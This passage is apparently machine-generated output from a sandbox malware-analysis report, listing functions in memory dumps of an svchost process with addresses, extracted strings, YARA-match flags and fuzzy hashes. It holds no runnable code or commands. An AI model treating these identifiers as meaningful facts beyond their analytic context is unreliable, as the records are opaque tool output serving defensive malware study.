                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: DebugPrintTimes
                                                                    • String ID: kLsE
                                                                    • API String ID: 3446177414-3058123920
                                                                    • Opcode ID: 27b7865bd071bd89595841fcebaa55175b416f99aa41f8a518e06fbcdd8b8374
                                                                    • Instruction ID: d82621cd518209afc43787bbdbc7af76903f94be15bbeefd24b72865a1c233f5
                                                                    • Opcode Fuzzy Hash: 27b7865bd071bd89595841fcebaa55175b416f99aa41f8a518e06fbcdd8b8374
                                                                    • Instruction Fuzzy Hash: 404189719013504BE731FF65E949B697FA4AB11724F1C821EEC909F2C9CBB84485C7A6
                                                                    Function 036452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@
                                                                    • API String ID: 0-149943524
                                                                    • Opcode ID: a3e669032be63148fc582e8a5b8326c8c8c066297ac3a3ed1e97b60e7826532c
                                                                    • Instruction ID: 1d838454005d71be900683d78218450bf63a32e8a8788f1aa21738fbb595d2ad
                                                                    • Opcode Fuzzy Hash: a3e669032be63148fc582e8a5b8326c8c8c066297ac3a3ed1e97b60e7826532c
                                                                    • Instruction Fuzzy Hash: 42329B749083118BDB24CF18C680B3EB7E5EF86754F18492EFA969B3A0E734D855CB52
                                                                    Function 03632FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @4rw@4rw$PATH
                                                                    • API String ID: 0-2366389529
                                                                    • Opcode ID: 023c9aa3ba730e8dff961ab03c800ed178392423829caf6ed411e04152ac83bf
                                                                    • Instruction ID: c7f2ed9faacc10fb7b4ac0b0360b3df091f8f0f1326ef43721c1dde4de406b91
                                                                    • Opcode Fuzzy Hash: 023c9aa3ba730e8dff961ab03c800ed178392423829caf6ed411e04152ac83bf
                                                                    • Instruction Fuzzy Hash: D0F1D179E00258DBDB25DF98D981ABEBBF1FF4A700F688029E441AB350D7749C41CB65
                                                                    Function 036FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction ID: cebbe5c1e45975bd4e18db08795638696fde61b0f6d2d619a94603a1c12eeb5e
                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction Fuzzy Hash: 27C1CC312043429FDB24CF68C945B6BFBE5AF84318F088A2CFA99CA290D775E505CF95
                                                                    Function 03630CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • ResIdCount less than 2., xrefs: 0368EEC9
                                                                    • Failed to retrieve service checksum., xrefs: 0368EE56
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                    • API String ID: 0-863616075
                                                                    • Opcode ID: 5394d5e181c4a2895e3fb1b3525a552485fc303b5465257c9142ff308d4625f6
                                                                    • Instruction ID: c06d777cc868bbf6faafbc9238541352489e38bbc7d462d7af199cd1c1d58a35
                                                                    • Opcode Fuzzy Hash: 5394d5e181c4a2895e3fb1b3525a552485fc303b5465257c9142ff308d4625f6
                                                                    • Instruction Fuzzy Hash: C4E1E0B59087849FE324CF15C440BABFBE4FB89314F048A2EE5998B381DB759909CF56
                                                                    Function 00402640 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: gfff$yxxx
                                                                    • API String ID: 0-1072206253
                                                                    • Opcode ID: 6e219d9b59878aa2397c25f5aec55ec68866dd758e9fc5a02c9c9dec8b5488de
                                                                    • Instruction ID: be49c2f08b3924093565d501bf4de9474fb0f419de07a4b3ca87915af7dcc887
                                                                    • Opcode Fuzzy Hash: 6e219d9b59878aa2397c25f5aec55ec68866dd758e9fc5a02c9c9dec8b5488de
                                                                    • Instruction Fuzzy Hash: 6A51F136B0091687DF2C890DDA5467AB296EBD4315F18C23BE906EF7C0E6B9ED1187C4
                                                                    Function 036AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: f5bdff143d2a6c4c470b4854320c26fd364a918296e06342076583e22fc87f59
                                                                    • Instruction ID: 68e6d25f5e0dc5de08392799fb5897809773a15d80569401355860d50e0182c5
                                                                    • Opcode Fuzzy Hash: f5bdff143d2a6c4c470b4854320c26fd364a918296e06342076583e22fc87f59
                                                                    • Instruction Fuzzy Hash: 0D614975E00B089FDB24DFA88980AAEBBB9FB44700F14406DE559EB291D732AD01CF54
                                                                    Function 0364F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$
                                                                    • API String ID: 0-233714265
                                                                    • Opcode ID: c41bc117ed7162076341a955c59028e4e2cc6c521d759bc0a91d0352d730e7f3
                                                                    • Instruction ID: 1060b068f425ea77d3a0190241a6fadc331c18ccc876f4f26073853ce85301e8
                                                                    • Opcode Fuzzy Hash: c41bc117ed7162076341a955c59028e4e2cc6c521d759bc0a91d0352d730e7f3
                                                                    • Instruction Fuzzy Hash: F361A675E0074ADFDB20EFA4C684BA9BBB5BF48304F18446DE515AF680CB74A941CB94
                                                                    Function 0363A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0363A2FB
                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0363A309
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                    • API String ID: 0-2876891731
                                                                    • Opcode ID: 5dcd71b91432a139db6f7fdf6ae244b573d3a57d303d306f1f8b4ebc9892e036
                                                                    • Instruction ID: 970e1e6c2eb5572221054081cb045306dc4f79b8e693fbf99f600cbcc0516843
                                                                    • Opcode Fuzzy Hash: 5dcd71b91432a139db6f7fdf6ae244b573d3a57d303d306f1f8b4ebc9892e036
                                                                    • Instruction Fuzzy Hash: 2541B034A04649DBEF15CF99C950BAAB7F8EF46304F2844AADC40DB3A5E335D941CB41
                                                                    Function 0366329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local\$@
                                                                    • API String ID: 0-380025441
                                                                    • Opcode ID: c93007812512a8f47c54d277b154f11fc84f79e93fe3642663ae41977557109f
                                                                    • Instruction ID: 1eeef98b9222b5c2e4068286194c2290e8919a001eb6d77d27bba13261c55ff4
                                                                    • Opcode Fuzzy Hash: c93007812512a8f47c54d277b154f11fc84f79e93fe3642663ae41977557109f
                                                                    • Instruction Fuzzy Hash: FC31B37A508344EFC311DF28C980A5BBBE8FBC5694F58092EF59597360EA30DD05CB92
                                                                    Function 0363C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: MUI
                                                                    • API String ID: 0-1339004836
                                                                    • Opcode ID: 3d635077db32ab043391ab1d83842ce61f1b010174d51ec6212a2ac2cd4b1db1
                                                                    • Instruction ID: def04f2a4e08c6e44b639ae7ec58c3fd4a0cda41ca06e85e6e39239bf36bdefd
                                                                    • Opcode Fuzzy Hash: 3d635077db32ab043391ab1d83842ce61f1b010174d51ec6212a2ac2cd4b1db1
                                                                    • Instruction Fuzzy Hash: 3F824975E002189BDB24CFA9C980BEDFBB5FF4A710F188169E85AAB391D7309D41CB54
                                                                    Function 03682F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: P``wRb`w
                                                                    • API String ID: 0-2038367376
                                                                    • Opcode ID: 3097b659f3c0e12a4a67db8477c355f035d6f747438bc50806d54017c03a4a1f
                                                                    • Instruction ID: bdd28e9116e0171cc4b69c70332d2b31decd27e6efcac9248ed54c8a0f30740a
                                                                    • Opcode Fuzzy Hash: 3097b659f3c0e12a4a67db8477c355f035d6f747438bc50806d54017c03a4a1f
                                                                    • Instruction Fuzzy Hash: 0842F37DD04249AADF29EF68DA546BDFBB0AF0DB10F3C825AD441AB380D7748981CB54
                                                                    Function 036DA118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 7285ebbdc8d6d1625025dd5f817c950a4b7d4a9f7caee0f677c7c49bb6e47cba
                                                                    • Instruction ID: 71246390a9ed15d8ad398fd047a3d5282335d68fa9d79f4e3d270904c84e7079
                                                                    • Opcode Fuzzy Hash: 7285ebbdc8d6d1625025dd5f817c950a4b7d4a9f7caee0f677c7c49bb6e47cba
                                                                    • Instruction Fuzzy Hash: CE22DF74A08691CBDB24CFA9C294772B7F1AF44300F0C859AE886CF785E735E562CB64
                                                                    Function 0365FB80 Relevance: 1.8, Strings: 1, Instructions: 559COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: IrwIrw@4rw@4rw
                                                                    • API String ID: 0-3882697584
                                                                    • Opcode ID: 3c867be53c2c554a3f566d98594122699f75c8394f273a8fa809e1c6b3fb0a79
                                                                    • Instruction ID: 713a091efd85b061d5f0daae6aa6635ce90b7cb63c11f0220c2d48bebeec2b20
                                                                    • Opcode Fuzzy Hash: 3c867be53c2c554a3f566d98594122699f75c8394f273a8fa809e1c6b3fb0a79
                                                                    • Instruction Fuzzy Hash: B222C074900609EFDB14DFA8C990BAEB7B5FF48310F2485A9E814AB345E734EA41CF94
                                                                    Function 03637370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 60d3993411c8823ec46c496abefb167364dbb92d09aeaa0badcb3d0c38b155e4
                                                                    • Instruction ID: c72d7e21aa660630aab053b34df6614b7166a4c03696f19f6f4eac8964624f97
                                                                    • Opcode Fuzzy Hash: 60d3993411c8823ec46c496abefb167364dbb92d09aeaa0badcb3d0c38b155e4
                                                                    • Instruction Fuzzy Hash: 4DA18FB5608342CFD724DF28C580A2ABBE9FF89314F24496EE5858B351D730E945CB92
                                                                    Function 03652E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: a23065dfd1f7c0bda078af53e8cac8e49f9103cb0f2687e8c8bec579f63a991a
                                                                    • Instruction ID: 6f20ff28364915122a468ccee0b0b540335eec60431b9d76cfb865f03a52b7c9
                                                                    • Opcode Fuzzy Hash: a23065dfd1f7c0bda078af53e8cac8e49f9103cb0f2687e8c8bec579f63a991a
                                                                    • Instruction Fuzzy Hash: 6BF19E79608745CFDB21CF24C590B6ABBE5AF88A50F29487DFC8A8B340DB30D945CB52
                                                                    Function 00416B63 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (
                                                                    • API String ID: 0-3887548279
                                                                    • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                    • Instruction ID: 7ad8aa95e94de6003bc3965381912524fe7ad0a50bb2939ee9868d1a0a972423
                                                                    • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                    • Instruction Fuzzy Hash: C8021EB6E006189FDB14CF9AD4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                                                    Function 0365FDC0 Relevance: 1.6, Strings: 1, Instructions: 390COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: IrwIrw@4rw@4rw
                                                                    • API String ID: 0-3882697584
                                                                    • Opcode ID: 8010ce45e0ca5b65d77275f35b6bc2585a90d57dca97f7c3348b01d0fd3c1fd6
                                                                    • Instruction ID: a5d9c1cc6756645560d32020e50053c85bd54a0cb99d226ebeca0b9decb8939c
                                                                    • Opcode Fuzzy Hash: 8010ce45e0ca5b65d77275f35b6bc2585a90d57dca97f7c3348b01d0fd3c1fd6
                                                                    • Instruction Fuzzy Hash: 1CF19E74900609DFDB14DFA8C990AAEBBB4FF48314F2885A9E805AB345E735DE45CF90
                                                                    Function 0366F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 908288775244fba5e7657664d9a15f1a7e495d0b5839d18e1909d4f8f0143b64
                                                                    • Instruction ID: bc99c930b40c4da76929bcfbd83a8513674420713844b09f3889f73e16352f97
                                                                    • Opcode Fuzzy Hash: 908288775244fba5e7657664d9a15f1a7e495d0b5839d18e1909d4f8f0143b64
                                                                    • Instruction Fuzzy Hash: 40414AB4900288AFDB20DFA9D580AADFBF4FB49340F54816ED959EB211D734A950DF60
                                                                    Function 03630100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: cfc405c0a1a7c7a04ecaf35f9db0f8b7c162ebbd600aa53015ab419d75e7064a
                                                                    • Instruction ID: 07159e96efa2cd17355f1abeb3b63d93af1dfa92dbd1209198c2ffa6f7f29da9
                                                                    • Opcode Fuzzy Hash: cfc405c0a1a7c7a04ecaf35f9db0f8b7c162ebbd600aa53015ab419d75e7064a
                                                                    • Instruction Fuzzy Hash: 36A15D35A083686BDF24DB688A41BFEA7B85F4B304F0840DDED876B381C6B5C949CB55
                                                                    Function 0366A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GlobalTags
                                                                    • API String ID: 0-1106856819
                                                                    • Opcode ID: 1a44244ca997e04928b26640cd75a2126115a72ca856b0f3cb1cf4117fdd01a8
                                                                    • Instruction ID: e489b179006cfa1e171b88ac69ea38764c3d16dcfa29eb499e8209c49e8c2957
                                                                    • Opcode Fuzzy Hash: 1a44244ca997e04928b26640cd75a2126115a72ca856b0f3cb1cf4117fdd01a8
                                                                    • Instruction Fuzzy Hash: E9713975E0061A9FDB28CF9CD6946ADBBB5BF48740F18816EE806AB340D7709D41CF64
                                                                    Function 0363973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                    • Instruction ID: 1cfc58168302b2c59493645412338db0ecc247658966df5d6d3be76a11286db7
                                                                    • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                    • Instruction Fuzzy Hash: 11617D75D00219ABDF21DF99C944BAEFBF8FF85714F144A6AE810A7290D7B49901CF50
                                                                    Function 0362B2D3 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 04rw04rwIrwIrw@4rw@4rw
                                                                    • API String ID: 0-2844649184
                                                                    • Opcode ID: 782cade38c00e67b85660adf96ad08f6b1d10f3eeb57d045d472455180263955
                                                                    • Instruction ID: db6e9885206f66aaeee56d51d372365531a1e5d1b64849edb898a59d71f7e5b9
                                                                    • Opcode Fuzzy Hash: 782cade38c00e67b85660adf96ad08f6b1d10f3eeb57d045d472455180263955
                                                                    • Instruction Fuzzy Hash: 69414531600B10AFD725EF25D980F26BBA8EF45760F1A846DE6099B350DB34DC01CFA4
                                                                    Function 036BF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                    • Instruction ID: de69738bca26aab09e451f26a3882d74ea14f9395ea660894c422b55e20d1718
                                                                    • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                    • Instruction Fuzzy Hash: 38517872604305AFD721EF54CD40FAAB7F8FB84B50F04092DBA809B2A0D7B1E954CB95
                                                                    Function 0364E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: EXT-
                                                                    • API String ID: 0-1948896318
                                                                    • Opcode ID: 4b727eda413d6b17d6b9535ebb99220816a5a1de4fb35cb3d6c654595c926214
                                                                    • Instruction ID: 21f83fc0e2911a1b284390625cdc9e58a31a0de520c8bf6e8593683e988d60ba
                                                                    • Opcode Fuzzy Hash: 4b727eda413d6b17d6b9535ebb99220816a5a1de4fb35cb3d6c654595c926214
                                                                    • Instruction Fuzzy Hash: 26418076A083019BD710DB75CA84B6BB7E8BF88714F440D2DF985DB280EB75D904C79A
                                                                    Function 036EB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PreferredUILanguages
                                                                    • API String ID: 0-1884656846
                                                                    • Opcode ID: 429f081783d11c63b27201517ee6105645ede39115fdab76c1cb3547c2d0eb9c
                                                                    • Instruction ID: 41d73c71cceed6cf726749f2e6388583aa4094814e69624f26ebc3b890213ad4
                                                                    • Opcode Fuzzy Hash: 429f081783d11c63b27201517ee6105645ede39115fdab76c1cb3547c2d0eb9c
                                                                    • Instruction Fuzzy Hash: 1041E636D05219ABCF11DA94C941BEEF7B9EF44710F05016AE911EB354DAB0DE48CBA4
                                                                    Function 036AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    • Opcode ID: e6d4eaa618891ffa01522ac999162f7e0c31a470fadd53387f9aa5ba82bf82e3
                                                                    • Instruction ID: 5050e1ac809b3756096bbe2c335ae7b4af01d888695b53cc4544b52ddb942a9e
                                                                    • Opcode Fuzzy Hash: e6d4eaa618891ffa01522ac999162f7e0c31a470fadd53387f9aa5ba82bf82e3
                                                                    • Instruction Fuzzy Hash: 2E4145B5D0062CABDB21DB54CC84FDEB77CAB45714F4045E9E608EB240DB709E898FA8
                                                                    Function 036B97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: verifier.dll
                                                                    • API String ID: 0-3265496382
                                                                    • Opcode ID: 9ae3b7526a365b293466ce1bd8841c921e15d89f547e2c05b9a7152c0bcb7cb2
                                                                    • Instruction ID: 0d6f0649fefcb7a4e82c02fea64c8bf698d9348f0b97a41022c05c5199b2e6d8
                                                                    • Opcode Fuzzy Hash: 9ae3b7526a365b293466ce1bd8841c921e15d89f547e2c05b9a7152c0bcb7cb2
                                                                    • Instruction Fuzzy Hash: 153180B5A403019FDB24DF699950AB6B6F5EB49310F98887EE6099F381E7318C818B94
                                                                    Function 036636EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Flst
                                                                    • API String ID: 0-2374792617
                                                                    • Opcode ID: 1cdf4a0237750d30059002fb375216ce37e3c0f1c1d772a12f1314767932ef6a
                                                                    • Instruction ID: 4af63eb8ca623391cb8efb56aff8c7f097b3532c009b5dd5689292bbb993af26
                                                                    • Opcode Fuzzy Hash: 1cdf4a0237750d30059002fb375216ce37e3c0f1c1d772a12f1314767932ef6a
                                                                    • Instruction Fuzzy Hash: 7A4198B56053019FC314CF18C184A16FBE4EB89754F28856EE44A8F391DB31D942CF99
                                                                    Function 03629730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: L4rwL4rw
                                                                    • API String ID: 0-1810648253
                                                                    • Opcode ID: 7cebd6000d66b6e2583145ea99ce1f9b199878e5d8c6c694a766d0d43a5fab1b
